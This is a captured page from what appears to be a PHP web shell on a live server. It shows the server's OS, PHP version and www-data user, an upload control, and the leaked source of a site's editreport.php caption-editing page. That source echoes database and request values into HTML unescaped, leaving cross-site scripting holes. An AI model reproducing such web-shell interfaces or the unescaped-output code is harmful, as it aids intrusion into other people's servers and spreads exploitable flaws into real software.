( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../tmpr/../tmpr/..//pages/editreport.php
<?php


$VideoPath = "uploads/live/";
$live_img = 'uploads/images/';	
if($_GET["msg_id"] == "0")
{

 
	$result = $db->getnewsbyidr3($msg_id);
	$msg_id= $result[0]["msg_id"];
	  $type= $result[0]["type"];	
	   	 if (empty($msg_id)){header("Location: indexAlone.php?mode=upload"); }
	  if ($type !=0 ){header("Location: indexAlone.php?mode=photos"); }
}
else
{
	
	
	
 $msg_id = $db->base64url_decode($msg_id);
 $result = $db->getnewsbyidr2($msg_id);	
}
 
 $catalogid = $result[0]["catalogid"];
$title = $result[0]["title"];
  $message = $result[0]["message"];
$viewnum = $result[0]["viewnum"];
$rating = $result[0]["rating"];
$picture = $result[0]["picture"];
$ratenum = $result[0]["ratenum"];
$episodeid = $result[0]["episodeid"];
$slug = $result[0]["slug"];
$keywords = $result[0]["keywords"];
$isdisplay = $result[0]["isdisplay"];
$description = $result[0]["description"];
$vcat = $result[0]["vcat"];
$summary = $result[0]["summary"];
$video = $result[0]["video"];
$thumb= $result[0]["thumb"];
 $original= $result[0]["original"];
   

?>
 
 
<form action="indexAlone.php?mode=photos" name="myform" id="myform" method="POST" >


<table width="100%" border="0">
  <tr>
    <td width="62%" valign="top"> <h2 style="margin-top:0px" class="post-title">Edit Caption</h2> </td>
    <td width="38%" align="right" valign="top">
    
    
    
    <input name="goCap" value="Finish" type="submit"  class="btn-lg btn-info pull-right  " style=" margin-top:2px;border:0px;width:105px; margin-right:20px; background-color:#F2B601"  >
    
    
   <?php if ($action=="filter"){?> <?php /*?><input name="goCap" value="Make *Startag" type="submit"  class="btn-lg btn-info pull-right  " style=" margin-top:2px;border:0px; margin-right:5px; background-color:#C39"  ><?php */?><?php } ?>  
    </td>
  </tr>
  
   
</table>


 
 
  <center><img class="" src="v/uploads/raw/<?php echo $original ?>" id="picme" vspace="25" style="min-width:500px; max-width:600px; margin-bottom:15px; border-radius: 10px;"  >                
 
                  <input type="hidden" name="msg_id" value="<?php print "$msg_id"; ?>">
                  <input type="hidden" name="action" value="<?php print "$action"; ?>">
                  
                  <input type="hidden" name="filter" value="<?php print "$filter"; ?>">
                   <div class="form-group" style="width:70%">
            
              <div class="input-group m-b"> <span class="input-group-addon lt  no-border  bg-info dk"> Caption </span>
                    
                      <input name="mytitle"  type="text" placeholder="Caption" class="form-control input-lg"  id="mytitle" maxlength="300" value="<?php  print "$message"; ?>"></div>
          </div>
          
          
          
          
                       
                        <br />

                      
  </center></form>